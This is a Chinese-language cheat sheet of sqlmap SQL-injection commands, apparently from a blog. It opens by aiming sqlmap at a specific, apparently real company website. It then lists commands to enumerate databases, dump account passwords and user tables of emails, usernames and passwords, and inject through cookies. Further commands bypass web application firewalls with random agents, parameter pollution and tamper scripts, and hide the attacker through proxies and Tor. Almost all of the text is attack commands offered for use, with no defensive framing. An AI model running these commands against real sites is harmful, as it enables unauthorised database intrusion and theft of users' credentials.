SQLMap笔记

Sqlmap笔记

sqlmap -u http://www.keruihz.com/news_show.aspx?id=97

sqlmap -u http://www.keruihz.com/news_show.aspx?id=97 --tables

nmap --script=vuln    漏洞扫描脚本

sqlmap -u    注入点  检测注入点是否可用

sqlmap -u  注入点  --batch  自动输入

暴库

sqlmap -u    注入点  --dbs 

Web当前使用的数据库

sqlmap -u    注入点  --current-db

Web数据库使用的账户

sqlmap -u    注入点  --current-user

列出sqlserver所有用户

sqlmap -u    注入点  --users

数据库账户与密码

sqlmap -u    注入点  --passwords

列出数据库中的表

sqlmap -u    注入点  -D tourdata  --tables (-D指定数据库名称)

列出表中字段

sqlmap -u    注入点  -D  tourdata -T  userb  --columns

爆字段内容

sqlmap -u注入点-D  tourdata -T  userb  -C “email,username,userpassword”  --dump  (将结果导出)

指定导出特定范围字段内容

sqlmap -u注入点-D  tourdata -T  userb  -C “email,username,userpassword”--start 1 --stop 10  --dump  (1,10行数)

Cookie注入

sqlmap -u    “注入点”  --cookie “id=97” --level 2

sqlmap -u    “注入点”  --table --cookie “id=97” --level 2

sqlmap -u    “注入点” --columns -T “user”  --cookie “id=97” --level 2

sqlmap -u    “注入点” --dump  -C “username,password”--columns -T “user”  --cookie “id=97” --level 2

可对以上参数进行结合使用

python sqlmap.py  -u  “注入点”  -f --banner  --dbs  --users 

绕过防火墙注入

确认是否开了WAF

Sqlmap  -u  “注入点”  --thread  10  --identify-waf  (首选)

sqlmap  -u  “注入点” --thread 10  --check-waf  备选

使用参数绕过

Sqlmap -u  “注入点” --random-agent -v 2  (浏览器绕过)

Sqlmap -u  “注入点”  --hpp  -v 3  (参数污染绕过)

Sqlmap -u  “注入点”  --delay=3.5  --time-sec=60 

Sqlmap  -u  “注入点” --proxy=211.211.211.211.8080  --proxy-cred=211.:985 代理注入

sqlmap  -u  “注入点” --ignore-proxy  禁止用代理注入,直接注入

sqlmap  -u  “注入点”  --flush-session  清空会话,重构注入

sqlmap  -u  “注入点” -hex  或者--no-cast  进行字符码转换

sqlmap  -u  “注入点” --mobile  对移动端的服务器进行注入

sqlmap  -u  “注入点” --tor  匿名注入

脚本注入的格式

sqlmap  -u  “注入点” --tamper=A.py,B.py  A,B是脚本


你可能感兴趣的:(SQLMap笔记)